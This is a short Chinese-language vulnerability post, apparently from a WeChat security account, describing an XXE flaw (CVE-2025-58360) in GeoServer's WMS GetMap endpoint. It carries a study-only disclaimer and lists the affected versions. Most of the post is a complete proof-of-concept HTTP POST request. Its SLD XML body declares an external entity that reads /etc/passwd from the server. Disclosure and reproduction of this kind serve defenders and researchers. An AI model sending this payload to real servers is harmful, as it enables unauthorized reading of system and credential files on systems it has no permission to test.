免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞介绍
GeoServer 是一款用于共享和编辑地理空间数据的开源服务器,现已发现存在 XML 外部实体 (XXE) 漏洞 (CVE-2025-58360)。该漏洞影响 2.26.0 至 2.26.2 之前的版本以及 2.25.6 之前的版本,这些版本在通过 /geoserver/wms 操作的 GetMap 端点接收 XML 输入时,未进行充分的清理。该漏洞于 2025 年 11 月 25 日被发现并披露。
影响范围
2.26.0 <= version < 2.26.2
version < 2.25.6
漏洞复现
POC:
(这微信页面直接复制代码格式会乱,可以浏览器打开复制)
POST /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&layers=topp:states&bbox=-130,24,-66,50&width=800&height=400&srs=EPSG:4326&format=image/png HTTP/1.1
Host: xxxx
Content-Type: application/vnd.ogc.sld+xml
Content-Length: 299
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0" xmlns="http://www.opengis.net/sld">
<NamedLayer>
<Name>&xxe;</Name>
<UserStyle/>
</NamedLayer>
</StyledLayerDescriptor>
没有回复内容